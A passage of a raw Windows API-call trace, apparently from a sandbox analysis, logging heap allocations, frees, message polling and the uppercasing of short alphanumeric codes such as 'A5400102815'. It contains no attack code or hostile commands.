returned 0x24a9e10 [0199.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.204] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.205] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.205] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.206] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.207] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.207] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.207] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.208] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.208] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.210] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.210] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.211] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.211] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.211] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.213] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.213] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0199.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.214] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0199.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.215] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.217] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 